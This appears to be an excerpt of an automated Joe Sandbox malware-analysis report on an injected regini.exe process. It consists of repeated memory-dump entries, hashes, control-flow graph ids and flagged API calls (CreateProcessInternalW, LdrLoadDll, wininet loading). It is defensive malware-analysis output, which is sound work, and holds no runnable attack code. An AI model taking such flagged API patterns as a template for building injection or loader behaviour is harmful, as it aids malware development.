                                                                    • Opcode Fuzzy Hash: 2cadfc41327b4bb12c4be7e172952bb3ff4bd0c15ff566897a5d3e929471c4f4
                                                                    • Instruction Fuzzy Hash: FA900435311404030105FF5C07445470047C7DD3513D5C131F1015754DD771CD715131
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 40dde0c8389298ad797ae564f8d4a8148028744fb6309ae09c708644ea90493b
                                                                    • Instruction ID: 4cf9eaf36b44b2e0c33c4b9db8789212870a99f51b200a27fb2f26bb02034f24
                                                                    • Opcode Fuzzy Hash: 40dde0c8389298ad797ae564f8d4a8148028744fb6309ae09c708644ea90493b
                                                                    • Instruction Fuzzy Hash: 3B90026134140842D100B6584454B460006C7E5301F95C115E1064658E8759CD526126
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b7d77cbb24993b8e9b22c03e2ab0a95b5023f68450dab8eaf4f102ea49a633bb
                                                                    • Instruction ID: 33800ff4ef5930c83dd1e0d9663238ba41a3c577db1de7273f67c2703e97dc23
                                                                    • Opcode Fuzzy Hash: b7d77cbb24993b8e9b22c03e2ab0a95b5023f68450dab8eaf4f102ea49a633bb
                                                                    • Instruction Fuzzy Hash: D6900221211C0442D200BA684C54B47000687D4303F95C215A0154658DCA5589615521
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 951bdee1c65164b812762a832030fd755912015f1b61fc8309d360fda7d38383
                                                                    • Instruction ID: 6005ef6f093c2f0f46cd85166790aa9ef261c7d3b9e208cde4e5076d827fb4b6
                                                                    • Opcode Fuzzy Hash: 951bdee1c65164b812762a832030fd755912015f1b61fc8309d360fda7d38383
                                                                    • Instruction Fuzzy Hash: ED900221601404424140B66888849464006ABE5311795C221A0998654E869989655665
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 02c1760a81aa253f97197a968635bdb7a0bdfe00a0155ca24eafc6807ca49990
                                                                    • Instruction ID: 2009c4b21c502db950d934bcdac7fa63bf7a7341f15f1866729f363aeed19f2c
                                                                    • Opcode Fuzzy Hash: 02c1760a81aa253f97197a968635bdb7a0bdfe00a0155ca24eafc6807ca49990
                                                                    • Instruction Fuzzy Hash: 3990026120180803D140BA584844647000687D4302F95C111A2064659F8B698D516135
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 110743bf36a287006f2762d9603a0069fbb5422e9b5d2e6f89d15cac22eb950b
                                                                    • Instruction ID: a6601a38d3994d050a93b4310d5cfa758d354a5252bd310f3d630d69f2eca991
                                                                    • Opcode Fuzzy Hash: 110743bf36a287006f2762d9603a0069fbb5422e9b5d2e6f89d15cac22eb950b
                                                                    • Instruction Fuzzy Hash: 8E90022160140902D101B6584444656000B87D4341FD5C122A1024659FCB658A92A131
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 424cd822e844f0de59424d2ceb0219ff5c0efd77449fee26d3c563f4c17a2cf2
                                                                    • Instruction ID: 550db0ed94396a8b97b0d23723babb47a8ca8f19d5d513dc8a3aec6ce304e473
                                                                    • Opcode Fuzzy Hash: 424cd822e844f0de59424d2ceb0219ff5c0efd77449fee26d3c563f4c17a2cf2
                                                                    • Instruction Fuzzy Hash: 2F90022130140403D140B65854586464006D7E5301F95D111E0414658DDA5589565222
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 7eda0c77d4ed49c629b633745327f00a43da01ac79acd2e7744c66b46c7482f4
                                                                    • Instruction ID: eb3b26cc62c91c58aa2bcf805b03df034cd8fd138102a157ab3551ec396ee687
                                                                    • Opcode Fuzzy Hash: 7eda0c77d4ed49c629b633745327f00a43da01ac79acd2e7744c66b46c7482f4
                                                                    • Instruction Fuzzy Hash: 7390022921340402D180B658544864A000687D5302FD5D515A001565CDCA5589695321
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0c1941189cb1d193a099106bec33393777b3f246b878689b08df1d155923ecdd
                                                                    • Instruction ID: 6cebf13566ce982b6a45d412a60939e0e5e16a162780faa10336b83753f66aa7
                                                                    • Opcode Fuzzy Hash: 0c1941189cb1d193a099106bec33393777b3f246b878689b08df1d155923ecdd
                                                                    • Instruction Fuzzy Hash: 4490023120140813D111B6584544747000A87D4341FD5C512A042465CE97968A52A121
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 253e6dcfcae3c80fa1c042529e4a1fe9e781fa790703fd62d34e43de3fad84a2
                                                                    • Instruction ID: 3cd3554952be4e277cf9caf681f4d01bb0d632706e383e7fb4c57cb3c80cca1e
                                                                    • Opcode Fuzzy Hash: 253e6dcfcae3c80fa1c042529e4a1fe9e781fa790703fd62d34e43de3fad84a2
                                                                    • Instruction Fuzzy Hash: DE900221242445525545F6584444547400797E43417D5C112A1414A54D86669956D621
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0

                                                                    Control-flow Graph

                                                                    control_flow_graph 459 2e1103a-2e11044 460 2e11046-2e1104d 459->460 461 2e1107e-2e11081 459->461 462 2e11096-2e110ab 460->462 463 2e1104f-2e11059 460->463 464 2e110ad-2e110c5 462->464 465 2e1112c-2e1114e 462->465 463->461 464->465 466 2e11170-2e11175 465->466 467 2e11150-2e11161 PostThreadMessageW 465->467 467->466 468 2e11163-2e1116d 467->468 468->466
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: +Yf$7046-nn1K$7046-nn1K
                                                                    • API String ID: 0-152878582
                                                                    APIs
                                                                    • PostThreadMessageW.USER32(7046-nn1K,00000111,00000000,00000000), ref: 02E1115D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: 7046-nn1K$7046-nn1K
                                                                    • API String ID: 1836367815-59622768
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InitializeUninitialize
                                                                    • String ID: @J7<
                                                                    • API String ID: 3442037557-2016760708
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000007D0), ref: 02E23D8B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: net.dll$wininet.dll
                                                                    • API String ID: 3472027048-1269752229
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InitializeUninitialize
                                                                    • String ID: @J7<
                                                                    • API String ID: 3442037557-2016760708
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02E148F2
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02E148F2
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,?,?,?,02E1864E,00000010,?,?,?,00000044,?,00000010,02E1864E,?,?,?), ref: 02E29B40
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E09E25
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E09E25
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,33F84D8B,00000007,00000000,00000004,00000000,02E140EB,000000F4), ref: 02E29A8F
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(02E11D69,?,02E25DDA,02E11D69,02E2589E,02E25DDA,?,02E11D69,02E2589E,00001000,?,?,00000000), ref: 02E29A3F
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02E186BC
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,02E12060,02E281DF,02E2589E,02E12023), ref: 02E184B3
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,02E12060,02E281DF,02E2589E,02E12023), ref: 02E184B3
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936664360.0000000003950000.00000040.00000800.00020000.00000000.sdmp, Offset: 03950000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3950000_regini.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936664360.0000000003950000.00000040.00000800.00020000.00000000.sdmp, Offset: 03950000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3950000_regini.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936664360.0000000003950000.00000040.00000800.00020000.00000000.sdmp, Offset: 03950000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3950000_regini.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %218$%8>3$/xfn$24<8$;;6x$bygw$effe$lw%!$mfny$wcye$xegf$yg
                                                                    Strings
                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036A46FC
                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 036A4655
                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 036A4742
                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 036A4725
                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 036A4787
                                                                    • ExecuteOptions, xrefs: 036A46A0
                                                                    • Execute=1, xrefs: 036A4713
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-$0$0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp
